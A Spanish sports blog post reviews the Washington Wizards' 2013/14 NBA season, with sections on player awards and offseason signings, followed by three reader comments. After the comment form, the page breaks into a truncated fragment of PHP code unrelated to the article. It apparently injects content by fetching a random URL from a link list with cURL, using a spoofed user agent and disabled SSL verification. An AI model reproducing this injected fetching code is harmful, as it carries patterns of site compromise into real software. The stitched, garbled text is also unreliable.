Washington Wizards: Bien

01 de August de 2014 por Esteban

Los capitalinos se llevaron el premio a la ambición. En un año en el que casi todos los equipos del Este se armaron para perder la mayor cantidad de juegos posibles y buscar una buena posición en el draft, los Wizards tomaron la dirección opuesta, la que pocos aconsejaban: la de luchar por llegar a los playoffs a pesar de saber que no tendrían la mínima chance de ganar el campeoanto. ¿Como es el dicho? En la NBA o eres muy bueno como para campeonar o hay que ser muy malo para escoger bien en el draft. Lo intermedio, en teoría, no sirve. Pues para los Wizards sí que puede haber servido.

Para comprobarlo debemos remontarnos a la temporada 2011/2012. Aquellos Wizards dirigidos por Flip Saunders copiaban el proyecto de moda de aquellos días, el de los Oklahoma City Thunder, poniendo a sus mejores jóvenes a jugar juntos para que se desarrollasen y formasen una potencia. Con este objetivo el equipo arrancó el año con Wall, Young, Vesely, Blatche y McGee como puntales pero el resultado fue totalmente el opuesto al esperado. Los arranques de espanto, papelones y chiquilladas terminarían cortándose por lo sano: Nick Young a cambio de nada a los Clippers, Andray Blatche amnistiado a fin de curso y Javale McGee a los Nuggets a cambio de Nene. El brasileño cobraba millones y llegaba lesionado pero si se recuperaba bien resultaría un fichaje de lujo. La ambición estaba ahí.

Estos movimientos significaron el fin de un proyecto armado a base de jóvenes y que dejó paso a otro en el que objetivo a corto plazo era empezar a ganar juegos. Aquel verano utilizaron el contrato de Rashard Lewis, al que podría haber cortado y ahorrarse muchísimos millones, para traerse a otro interno como Emeka Okafor y un alero de experiencia como Trevor Ariza, para darle una contención más firme a Wall y el recién llegado Bradley Beal. La ambición estaba ahí. Sin embargo, las sucesivas lesiones de Ariza, Beal, Wall y principalmente Nene no dejaron que proyecto fraguara pero al menos encontraron en un desahuciado Martell Webster un hombre útil que podía ayudar. 

Este año parecía que la maldición continuaba con una nueva y grave lesión de Okafor pero la resolución de los despachos de los Wizards era firme y seguían teniendo entre ceja y ceja el objetivo de convertirse en un equipo con balance positivo. Para ello asumieron contratos (que luego cortarían) para traerse al polaco Marcin Gortat a cambio del propio Okafor. Nuevamente, muchos milllones gastados en pos de lograr entrar en PO.

Y finalmente la ambición demostrada durante estos últimos años ha tenido su premio en esta temporada 2013/2014. Por fin el equipo se ha mentido sano y la gerencia obtuvo su premio tras varios intentos fallidos. La idea de rodear a dos futuras estrellas de la liga como John Wall y Bradley Beal con hombres de experiencia que les permitan competir de verdad ha resultado ser la más propicia para el desarrollo de los jóvenes.  Al menos parece una idea mejor que hacerlos pelear por el pick 1 de la lotería año tras año hasta que por arte de magia dejen de perder y comiencen a ganar. Wall cumplió las expectativas y protagonizó un gran año y Beal arrancó con nivel All-Star pero una lesión le hizo bajar enteros. Aun así respondió aceptablemente.

A ellos dos había que sumarles dos jugadores como Trevor Ariza y Marcin Gortat, ambos en último año de contrato, que han cerrado una de las mejores temporadas de sus respectivas carrera los que les ha permitido firmar jugosos nuevos contratos. También se dio en la tecla con el papel de sexto hombre de Martell Webster, el trabajo de un obrero como Trevor Booker y la experiencia de Al Harrington. Además a lo largo de la temporada llegaron nuevos elementos, como el subestimado Drew Gooden, un hombre de utilidad para equipos competitivos, y Andre Miller mediante trade para darle más experiencia a la posición de base.

Estos hombres fueron el núcleo con el que Randy Wittman competió en los PO. A ellos se les unió un renqueante Nene Hilario que se perdió gran parte del año pero que apareció en el momento justo para mostrar un rendimiento memorable.

Ya en la cita máxima, los Wizards sorprendieron a propios y extraños destrozando a los Bulls de la mano de un Nene espectacular pero con un juego coral de sus 5 titulares que daba miedo. En la semifinal de conferencia se enfrentaban a unos Pacers muy cabizbajos y en el primer partido les robaron la localía lo que dejaba la final de conferencia al alcance de la mano. Sin embargo, Indiana renació cual ave fénix y les eliminó en 6 juegos. Posiblemente el vértigo acabó pasando factura.

No podemos darles el sobresaliente que hubiera supuesto el llegar a la final de conferencia pero cumplieron el objetivo que se marcaron a final de temporada, algo que no todos los equipos pueden decir. Si tenemos en cuenta que por fin han terminó una larga serie de intentos fallidos parecidos, este año ha supuesto el éxtasis para sus aficionados.

PREMIOS

MVP: No puede nombrarse otro que a John Wall porque es el jugador franquicia, la cara del equipo, y estuvo a la altura de los acontecimientos. Si bien con ayuda en todo momento y sus PO no fueron descollantes, mostró buena parte de lo que se esperaba de él. Sus deficiencias en la conducción y el tiro han aminorado y con tiempo puede hacerlas desaparecer.

Rookie: Gran decepción la de Otto Porter. Arrancó lesionado pero cuando se repuso nunca pudo entrar en la rotación. Todo un pick 3 que practicamente no jugó su primer año. Mucho esperaba particularmente de Glen Rice Jr. a quien tampoco se le dieron las oportunidades que merecía. Ambos han destacado en la Summer League en la que ha de ser la temporada de su redención.

Sorpresa: Marcin Gortat. El polaco se estableció como un pívot de élite junto a Steve Nash pero a la salida de este sus prestaciones bajaron drásticamente lo que alimentó la teoría de que era el canadiense el que lo hacía bueno. Protagonizó una liga regular aceptable pero unos Playoffs para el recuerdo. Frente a los Pacers firmó 12 puntos y 15 rebotes en el juego 1 y un 31 – 16 en el juego 5. Promediar casi un 20- 10 en playoffs es solo para elegidos. Gortat subió su nivel y se ganó el contrato que buscaba.

Decepción: Vamos a otorgárselo al brasileño Nene Hilario pero con matices. Una vez más ha sufrido numerosas lesiones que solo le han permitido disputar 52 partidos sin continuidad. A pesar de ello llegó a los PO y mostró su mejor versión. Sin embargo, justo en su mejor momento, protagonizó un altercado con Jimmy Butler que le conllevó la expulsión del partido y la expulsión para el siguiente lo que podría haber significado la eliminación para su equipo. Esto es Nene: un potencial All-Star que vive lesionado y que no tiene la cabeza del todo enfocada.

Esfuerzo en vano: Vamos a dárselo a Bradley Beal que también disputó unos PO de nivel superlativo, con 19.2 puntos, 5 rebotes, 4.5 asistencias y 1.6 robos de promedio, mejorando aún más el nivel mostrado en la regular. Candidato a ser el mejor escolta de la conferencia desde el próximo año.

JUGANDO A GM

A esta altura ya está todo el pescado vendido en la capital.

A mi parecer han hecho un gran trabajo con la renovación de Marcin Gortat. Sus PO merecía ese dinero y no se encuentran pívots de nivel en la liga por menos. El contrato el algo largo eso sí pero son las reglas del juego. Tambien aciertan en la renovación de los contratos de Webster y Gooden, en ambos casos muy merecidos y por valores justos, y también de Temple y Seraphin para terminar de completar el plantel por poco dinero.

Al contrario, no renovaron a Trevor Ariza que protagonizó un año fantástico pero sobre el que surgen dudas relacionados con su esfuerzo en último año de contrato. Hubiesen sido varios años y muchos millones para, a la vez, tapar a largo plazo a Porter y/o Rice. En su lugar han fichado a Paul Pierce por solo dos años y 5 millones y medio cada uno. El ex de Boston y Brooklyn no podrá aportar demasiado en cuanto a físico se refiere pero su experiencia y talento natural serán valiosísimos en los momentos más calientes de la temporada.

Por último han completado la plantilla con más jugadores útiles como son Kris Humpries y DeJuan Blair, ambos con contratos aceptables.

Los Wizards se encuentran en una inmejorable posición. A día de hoy son prácticamente una potencia en el Este pero aún tiene un margen de mejora notable con Wall, Beal, Porter y Rice. Mientras, la gerencia no le tiene miedo al gasto y ya cuenta en sus libros con mas de 80 millones de dólares en salarios. Con esa combinación, sumado a que juegan en una conferencia tan desahuciada, los Wizards podrían ser un verdadero candidato a finalistas de la misma.

Comenta

3 comentarios a esta entrada

  1. Lucho dice:
    #1

    No comparto la nota. Para mi tendria que ser la misma que los Bobcats, fue una gran temporada en la Capital

      Citar

  2. Esteban dice:
    #2

    Lucho:
    No comparto la nota. Para mi tendria que ser la misma que los Bobcats, fue una gran temporada en la Capital

    nadie daba un duro por los Bobcats a principio de año y superaron todas las expectativas

    quizá nadie diera un duro por los Wizards, pero no por que no tuvieran ambición, al contrario, como decimos la gerencia viene trabajando incansablemente para mterse en PO y realizaron movidas durante el año para potenciar el equipo, quizá es una sorpresa que llegaran tan lejos por lo que han mostrado últimamente, pero en los papeles y en la chequera, este es un equipo con aspiraciones de segunda ronda, y allí llegaron

      Citar

  3. TheDeerHunter dice:
    #3

    Coincido que se armaron muy bien y que por eso probablemente esa segunda ronda es menos sorprendente.
    Si se hubieran cargado a Indiana hubiera sido una campaña sobresaliente, pero aún así han sido uno de los equipos del año, por lo tanto a mí también se me antoja algo corta la nota.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>